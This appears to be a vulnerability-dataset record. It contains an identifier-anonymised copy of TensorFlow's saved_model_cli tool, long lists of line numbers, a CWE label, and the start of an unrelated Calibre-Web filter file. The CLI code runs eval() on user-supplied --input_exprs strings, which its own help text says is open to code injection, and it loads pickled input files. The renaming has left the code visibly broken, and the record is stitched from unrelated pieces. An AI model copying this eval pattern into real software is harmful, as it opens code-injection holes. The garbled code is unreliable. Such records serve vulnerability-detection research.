FUNC_6(VAR_77, 'Named Argument', VAR_6=4)
def FUNC_6(VAR_7, VAR_8='Argument', VAR_6=0):
VAR_27 = ' ' * VAR_6
def FUNC_31(VAR_32):
VAR_64 = '\'' * isinstance(VAR_32, str)
return VAR_64 + str(VAR_32) + VAR_64
def FUNC_30(VAR_28, VAR_33='\n'):
print(VAR_27 + VAR_28, VAR_33=end)
for index, element in enumerate(VAR_7, 1):
if VAR_6 == 4:
FUNC_30('%VAR_28 #%d' % (VAR_8, index))
if isinstance(element, six.string_types):
FUNC_30(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((VAR_6 + 1) * ' ' + '%VAR_28: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: [', VAR_33='')
for VAR_32 in element:
print('%s' % FUNC_31(VAR_32), VAR_33=', ')
print('\b\b]')
elif isinstance(element, dict):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: {', VAR_33='')
for (key, VAR_32) in element.items():
print('\'%VAR_28\': %s' % (str(key), FUNC_31(VAR_32)), VAR_33=', ')
print('\b\b}')
else:
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: %s' % str(element))
def FUNC_7(VAR_9, VAR_6=0):
VAR_27 = ' ' * VAR_6
def FUNC_30(VAR_28):
print(VAR_27 + VAR_28)
FUNC_30(' dtype: ' +
{VAR_32: key
for (key, VAR_32) in types_pb2.DataType.items()}[VAR_9.dtype])
if VAR_9.tensor_shape.unknown_rank:
VAR_65 = 'unknown_rank'
else:
VAR_66 = [str(dim.size) for dim in VAR_9.tensor_shape.dim]
VAR_65 = ', '.join(VAR_66)
VAR_65 = '(' + VAR_65 + ')'
FUNC_30(' VAR_65: ' + VAR_65)
FUNC_30(' name: ' + VAR_9.name)
def FUNC_8(VAR_2):
VAR_23 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
for VAR_3 in sorted(VAR_23):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(VAR_3))
VAR_3 = ','.join(VAR_3)
VAR_24 = FUNC_10(VAR_2, VAR_3)
for VAR_5 in sorted(VAR_24.keys()):
print('\nsignature_def[\'' + VAR_5 + '\']:')
FUNC_4(VAR_2, VAR_3, VAR_5,
VAR_6=1)
FUNC_5(VAR_2)
def FUNC_9(VAR_2, VAR_3):
return saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
def FUNC_10(VAR_2, VAR_3):
VAR_34 = saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
return VAR_34.signature_def
def FUNC_11(VAR_4):
VAR_35 = set(
meta_graph_lib.ops_used_by_graph_def(VAR_4.graph_def))
VAR_36 = VAR_1 & VAR_35
if VAR_36:
print(
'MetaGraph with tag set %VAR_28 contains the following denylisted ops:' %
VAR_4.meta_info_def.tags, VAR_36)
else:
print('MetaGraph with tag set %VAR_28 does not contain denylisted ops.' %
VAR_4.meta_info_def.tags)
def FUNC_12(VAR_2, VAR_3, VAR_5,
VAR_10, VAR_11,
VAR_12, VAR_13=None, VAR_14=False,
VAR_15=False):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_25 = FUNC_2(
VAR_4, VAR_5)
for input_key_name in VAR_10.keys():
if input_key_name not in VAR_25:
raise ValueError(
'"%s" is not a valid input key. Please choose from %VAR_28, or use '
'--FUNC_18 option.' %
(input_key_name, '"' + '", "'.join(VAR_25.keys()) + '"'))
VAR_37 = {
VAR_25[key].name: tensor
for key, tensor in VAR_10.items()
}
VAR_26 = FUNC_3(
VAR_4, VAR_5)
VAR_38 = sorted(VAR_26.keys())
VAR_39 = [
VAR_26[tensor_key].name
for tensor_key in VAR_38
]
with session.Session(VAR_13, graph=ops_lib.Graph()) as VAR_78:
if VAR_14:
print('Initializing TPU System ...')
VAR_78.run(tpu.initialize_system())
loader.load(VAR_78, VAR_3.split(','), VAR_2)
if VAR_15:
VAR_78 = local_cli_wrapper.LocalCLIDebugWrapperSession(VAR_78)
VAR_67 = VAR_78.run(VAR_39, feed_dict=VAR_37)
for i, output in enumerate(VAR_67):
VAR_79 = VAR_38[i]
print('Result for output key %VAR_28:\n%s' % (VAR_79, output))
if VAR_11:
if not os.path.isdir(VAR_11):
os.makedirs(VAR_11)
VAR_80 = os.path.join(VAR_11, VAR_79 + '.npy')
if not VAR_12 and os.path.exists(VAR_80):
raise RuntimeError(
'Output file %VAR_28 already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % VAR_80)
np.save(VAR_80, output)
print('Output %VAR_28 is saved to %s' % (VAR_79,
VAR_80))
def FUNC_13(VAR_16):
VAR_40 = {}
VAR_41 = VAR_16.split(';')
for input_raw in filter(bool, VAR_41): # skip empty strings
VAR_68 = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if VAR_68:
VAR_40[VAR_68.group(1)] = VAR_68.group(2), VAR_68.group(3)
else:
VAR_68 = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if VAR_68:
VAR_40[VAR_68.group(1)] = VAR_68.group(2), None
else:
raise RuntimeError(
'--VAR_44 "%s" format is incorrect. Please follow'
'"<VAR_69>=<filename>", or'
'"<VAR_69>=<filename>[<variable_name>]"' % input_raw)
return VAR_40
def FUNC_14(VAR_17, VAR_18=True):
VAR_40 = {}
for input_raw in filter(bool, VAR_17.split(';')):
if '=' not in VAR_17:
raise RuntimeError('--VAR_45 "%s" format is incorrect. Please follow'
'"<VAR_69>=<python expression>"' % VAR_17)
VAR_69, VAR_70 = input_raw.split('=', 1)
if VAR_18:
try:
VAR_40[VAR_69] = ast.literal_eval(VAR_70)
except:
raise RuntimeError(
f'Expression "{VAR_70}" is not a valid python literal.')
else:
VAR_40[VAR_69] = eval(VAR_70) # pylint: disable=eval-used
return VAR_40
def FUNC_15(VAR_19):
VAR_40 = FUNC_14(VAR_19)
for VAR_69, example_list in VAR_40.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
VAR_40[VAR_69] = [
FUNC_16(VAR_42) for VAR_42 in example_list
]
return VAR_40
def FUNC_16(VAR_20):
VAR_42 = example_pb2.Example()
for feature_name, feature_list in VAR_20.items():
if not isinstance(feature_list, list):
raise ValueError('feature VAR_32 must be a list, but %VAR_28: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
VAR_42.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
VAR_42.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
VAR_42.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
VAR_42.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %VAR_28 for VAR_32 %VAR_28 is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return VAR_42.SerializeToString()
def FUNC_17(VAR_16, VAR_17,
VAR_19):
VAR_43 = {}
VAR_44 = FUNC_13(VAR_16)
VAR_45 = FUNC_14(VAR_17, VAR_18=False)
VAR_46 = FUNC_15(VAR_19)
for VAR_72, (filename, variable_name) in VAR_44.items():
VAR_71 = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
if variable_name:
if isinstance(VAR_71, np.ndarray):
logging.warn(
'Input file %VAR_28 contains a single ndarray. Name key \"%VAR_28\" ignored.'
% (filename, variable_name))
VAR_43[VAR_72] = VAR_71
else:
if variable_name in VAR_71:
VAR_43[VAR_72] = VAR_71[variable_name]
else:
raise RuntimeError(
'Input file %VAR_28 does not contain variable with name \"%VAR_28\".' %
(filename, variable_name))
else:
if isinstance(VAR_71, np.lib.npyio.NpzFile):
VAR_81 = VAR_71.files
if len(VAR_81) != 1:
raise RuntimeError(
'Input file %VAR_28 contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
VAR_43[VAR_72] = VAR_71[VAR_81[0]]
else:
VAR_43[VAR_72] = VAR_71
for VAR_72, py_expr_evaluated in VAR_45.items():
if VAR_72 in VAR_43:
logging.warn(
'input_key %VAR_28 has been specified with both --VAR_44 and --input_exprs'
' options. Value in --VAR_45 will be used.' % VAR_72)
VAR_43[VAR_72] = py_expr_evaluated
for VAR_72, VAR_42 in VAR_46.items():
if VAR_72 in VAR_43:
logging.warn(
'input_key %VAR_28 has been specified in multiple options. Value in '
'--VAR_46 will be used.' % VAR_72)
VAR_43[VAR_72] = VAR_42
return VAR_43
def FUNC_18(VAR_21):
if VAR_21.all:
FUNC_8(VAR_21.dir)
else:
if VAR_21.tag_set is None:
FUNC_0(VAR_21.dir)
else:
if VAR_21.signature_def is None:
FUNC_1(VAR_21.dir, VAR_21.tag_set)
else:
FUNC_4(VAR_21.dir, VAR_21.tag_set, VAR_21.signature_def)
def FUNC_19(VAR_21):
if not VAR_21.inputs and not VAR_21.input_exprs and not VAR_21.input_examples:
raise AttributeError(
'At least one of --VAR_44, --VAR_45 or --VAR_46 must be '
'required')
VAR_43 = FUNC_17(
VAR_21.inputs, VAR_21.input_exprs, VAR_21.input_examples)
FUNC_12(VAR_21.dir, VAR_21.tag_set, VAR_21.signature_def,
VAR_43, VAR_21.outdir,
VAR_21.overwrite, VAR_13=VAR_21.worker,
VAR_14=VAR_21.init_tpu, VAR_15=VAR_21.tf_debug)
def FUNC_20(VAR_21):
if VAR_21.tag_set:
FUNC_11(
saved_model_utils.get_meta_graph_def(VAR_21.dir, VAR_21.tag_set))
else:
VAR_73 = saved_model_utils.read_saved_model(VAR_21.dir)
for VAR_4 in VAR_73.meta_graphs:
FUNC_11(VAR_4)
def FUNC_21(VAR_21):
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not VAR_21.convert_tf1_model:
VAR_74 = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=VAR_21.max_workspace_size_bytes,
precision_mode=VAR_21.precision_mode,
minimum_segment_size=VAR_21.minimum_segment_size)
VAR_75 = trt.TrtGraphConverterV2(
input_saved_model_dir=VAR_21.dir,
input_saved_model_tags=VAR_21.tag_set.split(','),
conversion_params=VAR_74)
try:
VAR_75.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
VAR_75.save(output_saved_model_dir=VAR_21.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=VAR_21.max_workspace_size_bytes,
precision_mode=VAR_21.precision_mode,
minimum_segment_size=VAR_21.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=VAR_21.dir,
input_saved_model_tags=VAR_21.tag_set.split(','),
output_saved_model_dir=VAR_21.output_dir)
def FUNC_22(VAR_21):
VAR_47 = (
VAR_21.checkpoint_path
or os.path.join(VAR_21.dir, 'variables/variables'))
if not VAR_21.variables_to_feed:
VAR_76 = []
elif VAR_21.variables_to_feed.lower() == 'all':
VAR_76 = None # We will identify them after.
else:
VAR_76 = VAR_21.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
VAR_47=checkpoint_path,
VAR_4=saved_model_utils.get_meta_graph_def(
VAR_21.dir, VAR_21.tag_set),
VAR_5=VAR_21.signature_def_key,
VAR_76=variables_to_feed,
output_prefix=VAR_21.output_prefix,
target_triple=VAR_21.target_triple,
target_cpu=VAR_21.target_cpu,
cpp_class=VAR_21.cpp_class,
multithreading=VAR_21.multithreading.lower() not in ('f', 'false', '0'))
def FUNC_23(VAR_22):
VAR_48 = (
'Usage examples:\n'
'To FUNC_18 all tag-sets in a SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73\n\n'
'To FUNC_18 all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve,gpu\n\n'
'To FUNC_18 all VAR_44 and VAR_67 TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve'
' --signature_def serving_default\n\n'
'To FUNC_18 all available information in the SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --all')
VAR_49 = VAR_22.add_parser(
'show',
description=VAR_48,
formatter_class=argparse.RawTextHelpFormatter)
VAR_49.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
VAR_49.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
VAR_49.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to FUNC_18, separated by \',\'')
VAR_49.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(VAR_28) and output(VAR_28) for')
VAR_49.set_defaults(func=FUNC_18)
def FUNC_24(VAR_22):
VAR_50 = ('Usage VAR_42:\n'
'To FUNC_19 input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_73 --VAR_3 serve \\\n'
' --signature_def serving_default \\\n'
' --VAR_44 input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --VAR_45 \'input3_key=np.ones(2)\' \\\n'
' --VAR_46 '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --VAR_11=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
VAR_51 = VAR_22.add_parser(
'run', description=VAR_50, formatter_class=argparse.RawTextHelpFormatter)
VAR_51.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_51.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
VAR_51.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
VAR_52 = ('Loading VAR_44 from files, in the format of \'<VAR_69>=<filename>,'
' or \'<VAR_69>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
VAR_51.add_argument('--inputs', type=str, default='', help=VAR_52)
VAR_52 = ('Specifying VAR_44 by python expressions, in the format of'
' "<VAR_69>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. Please note that the expression '
'will be evaluated as-is, and is susceptible to code injection. '
'When this is set, the VAR_32 will override duplicate input keys from '
'--VAR_44 option.')
VAR_51.add_argument('--input_exprs', type=str, default='', help=VAR_52)
VAR_52 = (
'Specifying tf.Example VAR_44 as list of dictionaries. For VAR_42: '
'<VAR_69>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --VAR_44 '
'and --VAR_45 option.')
VAR_51.add_argument('--input_examples', type=str, default='', help=VAR_52)
VAR_51.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(VAR_28) will be saved to given directory')
VAR_51.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
VAR_51.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
VAR_51.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be FUNC_19 on the VAR_13. '
'Valid VAR_13 specification is a bns or gRPC path.')
VAR_51.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the VAR_13 is a TPU job.')
VAR_51.set_defaults(func=FUNC_19)
def FUNC_25(VAR_22):
VAR_53 = ('Usage VAR_42:\n'
'To FUNC_20 for denylisted ops in SavedModel:\n'
'$saved_model_cli FUNC_20 --dir /tmp/VAR_73\n'
'To FUNC_20 a specific MetaGraph, pass in --VAR_3\n')
VAR_54 = VAR_22.add_parser(
'scan',
description=VAR_53,
formatter_class=argparse.RawTextHelpFormatter)
VAR_54.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_54.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to FUNC_20, separated by \',\'')
VAR_54.set_defaults(func=FUNC_20)
def FUNC_26(VAR_22):
VAR_55 = ('Usage VAR_42:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/VAR_73 \\\n'
' --VAR_3 serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
VAR_56 = VAR_22.add_parser(
'convert',
description=VAR_55,
formatter_class=argparse.RawTextHelpFormatter)
VAR_56.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_56.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
VAR_56.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_57 = VAR_56.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to FUNC_19 with the SavedModel')
VAR_58 = VAR_57.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
VAR_58.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
VAR_58.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
VAR_58.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
VAR_58.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
VAR_58.set_defaults(func=FUNC_21)
def FUNC_27(VAR_22):
VAR_59 = '\n'.join(
['Usage VAR_42:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli FUNC_22 \\',
' --dir /tmp/VAR_73 \\',
' --VAR_3 serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(VAR_0),
'',
'For VAR_42, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
VAR_60 = VAR_22.add_parser(
'aot_compile_cpu',
description=VAR_59,
formatter_class=argparse.RawTextHelpFormatter)
VAR_60.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_60.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(VAR_28) '
'and object file(VAR_28)'))
VAR_60.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_60.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
VAR_60.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
VAR_60.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, FUNC_19 (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
VAR_60.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
VAR_60.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(VAR_28), or if no '
'namespaces are given, within the global namespace.'))
VAR_60.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `VAR_76` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input VAR_7 from the signature as '
'well).'))
VAR_60.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
VAR_60.set_defaults(func=FUNC_22)
def FUNC_28():
VAR_61 = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
VAR_61.add_argument('-v', '--version', action='version', version='0.1.0')
VAR_22 = VAR_61.add_subparsers(
title='commands', description='valid commands', help='additional help')
FUNC_23(VAR_22)
FUNC_24(VAR_22)
FUNC_25(VAR_22)
FUNC_26(VAR_22)
FUNC_27(VAR_22)
return VAR_61
def FUNC_29():
logging.set_verbosity(logging.INFO)
VAR_61 = FUNC_28()
VAR_21 = VAR_61.parse_args()
if not hasattr(VAR_21, 'func'):
VAR_61.error('too few arguments')
VAR_21.func(VAR_21)
if __name__ == '__main__':
sys.exit(FUNC_29())
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
19,
21,
26,
30,
50,
51,
55,
56,
57,
59,
60,
63,
65,
73,
74,
77,
80,
92,
93,
97,
100,
105,
108,
117,
118,
122,
125,
130,
135,
136,
139,
142,
156,
160,
165,
171,
174,
175,
178,
184,
191,
211,
212,
220,
221,
224,
232,
236,
239,
263,
264,
267,
275,
279,
288,
289,
292,
295,
303,
311,
312,
315,
318,
324,
328,
333,
334,
337,
340,
346,
352,
353,
356,
359,
367,
374,
375,
381,
385,
404,
410,
413,
414,
415,
418,
419,
426,
431,
434,
440,
444,
445,
447,
449,
452,
454,
458,
459,
461,
465,
466,
471,
475,
476,
479,
487,
495,
498,
505,
507,
511,
520,
522,
523,
526,
529,
534,
537,
542,
548,
551,
552,
555,
559,
566,
569,
583,
584,
609,
610,
614,
619,
649,
652,
660,
664,
667,
668,
670,
683,
685,
695,
696,
703,
704,
712,
713,
716,
720,
724,
725,
726,
734,
735,
738,
741,
756,
757,
760,
771,
772,
775,
779,
780,
782,
810,
811,
814,
827,
839,
840,
885,
886,
963,
964,
985,
986,
1046,
1047,
1073,
1154,
1156,
1157,
1160,
1167,
1170,
1171,
1173,
1174,
1176,
1177,
1179,
1180,
1182,
1183,
1185,
1187,
1188,
1196,
1197,
1200,
15,
16,
17,
18,
19,
20,
62,
63,
64,
65,
66,
67,
68,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
177,
178,
179,
180,
181,
223,
224,
225,
226,
227,
228,
229,
230,
266,
267,
268,
269,
270,
271,
291,
292,
293,
294,
295,
296,
297,
298,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
336,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
355,
356,
357,
358,
359,
360,
361,
362,
380,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
525,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
554,
555,
556,
557,
558,
559,
560,
561,
562,
563,
564,
565,
566,
567,
568,
569,
570,
571,
572,
586,
613,
614,
615,
616,
617,
618,
619,
620,
621,
622,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
715,
716,
717,
718,
719,
737,
738,
739,
740,
741,
742,
743,
744,
745,
759,
760,
761,
762,
763,
774,
775,
776,
777,
778,
813,
814,
815,
816,
817,
842,
888,
966,
988,
1049,
1159,
1160,
1161,
1162,
1163
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
19,
21,
27,
31,
51,
52,
56,
57,
58,
60,
61,
64,
66,
74,
75,
78,
81,
93,
94,
98,
101,
106,
109,
118,
119,
123,
126,
131,
136,
137,
140,
143,
157,
161,
166,
172,
175,
176,
179,
185,
192,
212,
213,
221,
222,
225,
233,
237,
240,
264,
265,
268,
276,
280,
289,
290,
293,
296,
304,
312,
313,
316,
319,
325,
329,
334,
335,
338,
341,
347,
353,
354,
357,
360,
368,
375,
376,
382,
386,
405,
411,
414,
415,
416,
419,
420,
427,
432,
435,
441,
445,
446,
448,
450,
453,
455,
459,
460,
462,
466,
467,
472,
476,
477,
480,
488,
496,
499,
506,
508,
512,
521,
523,
524,
527,
530,
537,
540,
545,
558,
561,
562,
565,
569,
576,
579,
593,
594,
619,
620,
624,
629,
659,
662,
670,
674,
677,
678,
680,
693,
695,
705,
706,
713,
714,
722,
723,
726,
730,
734,
735,
736,
744,
745,
748,
751,
766,
767,
770,
781,
782,
785,
789,
790,
792,
820,
821,
824,
837,
849,
850,
895,
896,
975,
976,
997,
998,
1058,
1059,
1085,
1166,
1168,
1169,
1172,
1179,
1182,
1183,
1185,
1186,
1188,
1189,
1191,
1192,
1194,
1195,
1197,
1199,
1200,
1208,
1209,
1212,
15,
16,
17,
18,
19,
20,
63,
64,
65,
66,
67,
68,
69,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
178,
179,
180,
181,
182,
224,
225,
226,
227,
228,
229,
230,
231,
267,
268,
269,
270,
271,
272,
292,
293,
294,
295,
296,
297,
298,
299,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
337,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
356,
357,
358,
359,
360,
361,
362,
363,
381,
382,
383,
384,
385,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
398,
399,
400,
401,
402,
403,
404,
405,
406,
407,
408,
409,
410,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542,
543,
564,
565,
566,
567,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
581,
582,
596,
623,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
640,
641,
642,
643,
644,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
659,
660,
661,
662,
663,
664,
665,
666,
667,
668,
725,
726,
727,
728,
729,
747,
748,
749,
750,
751,
752,
753,
754,
755,
769,
770,
771,
772,
773,
784,
785,
786,
787,
788,
823,
824,
825,
826,
827,
852,
898,
978,
1000,
1061,
1171,
1172,
1173,
1174,
1175
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# custom jinja filters
from __future__ import division, print_function, unicode_literals
import datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask import Blueprint, request, url_for
from flask_babel import get_locale
from flask_login import current_user
from . import logger
jinjia = Blueprint('jinjia', __name__)
log = logger.create()
# pagination links in jinja
@jinjia.app_template_filter('url_for_other_page')
def url_for_other_page(page):
args = request.view_args.copy()
args['page'] = page
for get, val in request.args.items():
args[get] = val
return url_for(request.endpoint, **args)
